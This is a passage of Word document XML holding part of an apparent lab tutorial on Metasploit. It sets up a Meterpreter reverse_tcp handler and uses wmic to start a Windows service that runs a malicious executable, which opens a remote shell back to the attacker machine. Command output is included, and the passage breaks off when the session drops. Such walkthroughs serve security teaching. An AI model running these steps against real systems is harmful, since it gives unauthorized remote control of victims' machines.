        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>” console, next run the following commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0FDABB" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; use exploit/multi/handler </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>(handler) &gt; set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>/reverse\_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload =&gt; windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>/reverse\_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  exploit(handler) &gt; set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.134.135 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; 192.168.134.135 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  exploit(handler) &gt; set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; 80 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  exploit(handler) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A47076F" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>At this point it’s always a good idea to do the “show options” command to make sure everything is set up correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F4FC73" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>(handler) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E859A6C" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Module options (exploit/multi/handler):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2682087D" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Name  Current</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Setting  Required  Description ----  ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658C626C" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Payload options (windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>/reverse\_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A8C038" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Name      Current </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Setting  Required</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  Description ----      ---------------  --------  ----------- EXITFUNC  process          yes       Exit technique: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>seh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, thread, process, none LHOST     192.168.134.135  yes       The listen address LPORT     80               yes       The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E30F44" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CD8543" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Id  Name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> --  ---- 0   Wildcard Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117E21DA" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">If everything checks out then you’re ready to go, now just type “exploit”. This will wait until we run the executable on the target machine but when we do it will give us back our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE558C0" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>(handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8A8C34" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Started reverse handler on 192.168.134.135:80 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\*\] Starting the payload handler...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7131612F" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Now on the target windows machine we’ll need to start the service which will run our malicious executable then connect back to our attack machine giving us a command prompt. So run the </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00E557B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          </w:rPr>
          <w:t>wmic</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t> command below to start the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6A2E0E" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\\Users\\homer&gt;wmic service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>startservice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A758ACE" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>You should see similar output when you run this command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5AD1C3" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Executing (\\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\\WIN-B5JHUDECH2P\\ROOT\\CIMV2:Win32\_Service.Name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>="ose")-&gt;startservice()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792DDFE8" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you’ve started the service now it’s time to hop back over to your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command prompt to see if we get our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterperter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command prompt, you should see the following.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF3BEB7" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Sending stage (752128 bytes) to 192.168.134.134 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\*\] Meterpreter session 1 opened (192.168.134.135:80 -&gt; 192.168.134.134:49173) at 2012-03-22 23:18:56 -0400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E860FF" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DE13D8" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Anytime you get a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command prompt back that’s usually a win but wait everything is not as it seems. After about 30 - 40 seconds I see that my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> session ended.</w:t>
      </w:r>
